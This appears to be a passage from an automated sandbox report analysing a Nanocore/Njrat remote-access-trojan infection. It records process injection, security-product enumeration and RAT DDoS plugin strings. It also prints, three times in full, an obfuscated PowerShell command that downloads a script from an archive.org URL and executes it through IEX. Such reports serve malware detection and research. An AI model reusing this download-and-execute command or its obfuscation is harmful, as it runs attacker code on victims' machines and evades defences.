      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 40C000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: C76008
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');
      Source: aspnet_compiler.exe, 00000014.00000002.1175541598.0000000002D1A000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000016.00000002.1173256569.0000000001750000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: aspnet_compiler.exe, 00000014.00000002.1173305362.0000000001220000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000016.00000002.1173256569.0000000001750000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: aspnet_compiler.exe, 00000014.00000002.1173305362.0000000001220000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000016.00000002.1173256569.0000000001750000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: aspnet_compiler.exe, 00000014.00000002.1174501459.0000000002975000.00000004.00000001.sdmpBinary or memory string: Program Manager|$
      Source: aspnet_compiler.exe, 00000014.00000002.1173305362.0000000001220000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000016.00000002.1173256569.0000000001750000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: aspnet_compiler.exe, 00000014.00000002.1174501459.0000000002975000.00000004.00000001.sdmpBinary or memory string: Program Manager4
      Source: aspnet_compiler.exe, 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmpBinary or memory string: Program ManagerD$#k
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0013~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

      Stealing of Sensitive Information:

      barindex
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.3828a18.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.382d041.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.3828a18.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.3814575.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000014.00000002.1175964065.0000000003813000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000014.00000002.1170915770.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000014.00000002.1173629355.00000000027C1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 7072, type: MEMORYSTR
      Yara detected NjratShow sources
      Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 5596, type: MEMORYSTR

      Remote Access Functionality:

      barindex
      Detected Nanocore RatShow sources
      Source: aspnet_compiler.exe, 00000014.00000002.1178034772.0000000003B0C000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: aspnet_compiler.exe, 00000014.00000002.1178034772.0000000003B0C000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
